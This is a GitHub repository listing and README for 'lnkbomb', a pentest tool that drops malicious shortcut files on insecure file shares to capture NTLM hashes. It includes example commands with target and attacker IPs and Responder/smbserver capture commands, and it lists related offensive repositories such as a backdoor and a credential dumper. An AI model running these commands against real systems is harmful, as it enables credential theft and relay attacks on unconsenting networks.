dievus/lnkbomb dievus/lnkbomb

  • Stars
    star
    248
  • Rank 163,560 (Top 4 %)
  • Language
    Python
  • License
    MIT License
  • Created almost 3 years ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
dievus/lnkbomb
github

dievus

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Malicious shortcut generator for collecting NTLM hashes from insecure file shares.

Lnkbomb

ko-fi

Lnkbomb is used for uploading malicious shortcut files to insecure file shares. The vulnerability exists due to Windows looking for an icon file to associate with the shortcut file. This icon file can be directed to a penetration tester's machine running Responder or smbserver to gather NTLMv1 or NTLMv2 hashes (depending on configuration of the victim host machine). The tester can then attempt to crack those collected hashes offline with a tool like Hashcat, or relay them to a tool like ntlmrelayx for further exploitation.

The payload file is uploaded directly to the insecure file specified by the tester in the command line. The tester includes their IP address as well, which is written into the payload.

Version 2.0 is a total rebuild of the tool and uses the pysmb library, permitting unauthenticated and authenticated payload drops.

Python Usage

Installing Lnkbomb

Note that the project works consistently in Windows. It may have issues in Linux.

git clone https://github.com/dievus/lnkbomb.git

Change directories to lnkbomb and run:

python3 lnkbomb.py -h

This will output the help menu, which contains the following flags:

-h, --help - Lists the help options

-t, --target - Specifies the target IP address

-a, --attacker - Specifies the tester's attack machine IP address

-r, --recover - Used to remove the payload when testing is completed (ex. -r payloadname.url)

-w, --windows - New command - required for setting appropriate ports for Windows shares

-l, --linux - New command - required for setting appropriate ports for Linux shares

-n, --netbios - New command - netbios name for targeted Windows machines must be included

Examples of full commands include:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

You will need to utilize a tool like Responder or smbserver to capture the NTLM hash.
responder -I eth0 -dwFP -v

or

smbserver.py . . -smb2support

Notes

Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.

I know it's .url shortcuts and not .lnk extensions. I do it to trigger you.

More Repositories

1

Oh365UserFinder

Python3 o365 User Enumeration Tool
Python
459
star
2

PowerShellForPentesters

Course repository for PowerShell for Pentesters Course
PowerShell
400
star
3

threader3000

Multi-threaded Python Port Scanner with Nmap Integration
Python
281
star
4

msLDAPDump

LDAP enumeration tool implemented in Python3
Python
174
star
5

ADGenerator

Active Directory Generator files for Movement, Pivoting, and Persistence for Pentesters and Ethical Hackers.
PowerShell
172
star
6

msdorkdump

Google Dork File Finder
Python
162
star
7

printspoofer

155
star
8

msImpersonate

msImpersonate - User account impersonation written in pure Python3
Python
105
star
9

geeMailUserFinder

Python Gmail User Enumeration Tool
Python
96
star
10

msdnsscan

MayorSec DNS Enumeration Tool
Python
70
star
11

GatekeeperLite

Lite version of my Gatekeeper backdoor for public use.
Python
55
star
12

Python3-C2-Course-Code-Modules

Modules for my C2 course students to use for their own projects.
Python
54
star
13

PowerShellRunner

PowerShell runner for executing malicious payloads in order to bypass Windows Defender.
PowerShell
34
star
14

Firefox-Dumper

Tool to transfer credential files from Firefox to your local machine to decrypt offline.
Python
23
star
15

PythonCreateYourOwnSeries

Files for my Python3 Create Your Own Tool Series
Python
22
star
16

MayorbotC2

My attempt at weaponizing Discord.
Python
19
star
17

BlackLister

Blacklist generator for password filters
Python
10
star
18

msToolSet-Docker

Dockerized version of my most used tools.
Python
10
star
19

helper

PowerShell
10
star
20

bufferoverflow

Repository of Ruby related buffer overflow boilerplates
Python
9
star
21

MayorSecPasswordGenerator

Simple Python tool that generates a pseudo-random password with numbers, letters, and special characters in accordance with password policy best practices.
Python
7
star
22

toolsdirectory

PowerShell
7
star
23

CVE-2021-37832

CVE-2021-37832 - Hotel Druid 3.0.2 SQL Injection Vulnerability - 9.8 CVSS 3.1
6
star
24

CVE-2020-28351

CVE-2020-28351 - Reflected Cross-Site Scripting attack in ShoreTel version 19.46.1802.0.
5
star
25

CVE-2021-37833

CVE 2021-37833 Hotel Druid 3.0.2 Reflected Cross Site Scripting
4
star
26

reverse-shells

3
star
27

Wordlists

3
star
28

mayorscan

Mayor's Toolkit
Shell
3
star
29

MayorSecWorkoutTracker

MayorSec Workout Tracker
Python
3
star
30

Project_Plus

HTML
2
star
31

PythonBOF

Python
2
star
32

msesxicontroller

Python ESXi CLI Controller
Python
2
star
33

pingsweep

The first tool I wrote when I started Pentesting.
Shell
2
star
34

MayorSec-SecuroText3000

SecuroText3000 will take unencrypted text files and encrypt the content utilizing a highly modified Vigenere cipher key. The increased key deviates from the typical alphabetical system, which increases the difficulty in cracking when the full key is not known.
Python
2
star
35

dievus

Config files for my GitHub profile.
1
star
36

skidnomore3000

Shell
1
star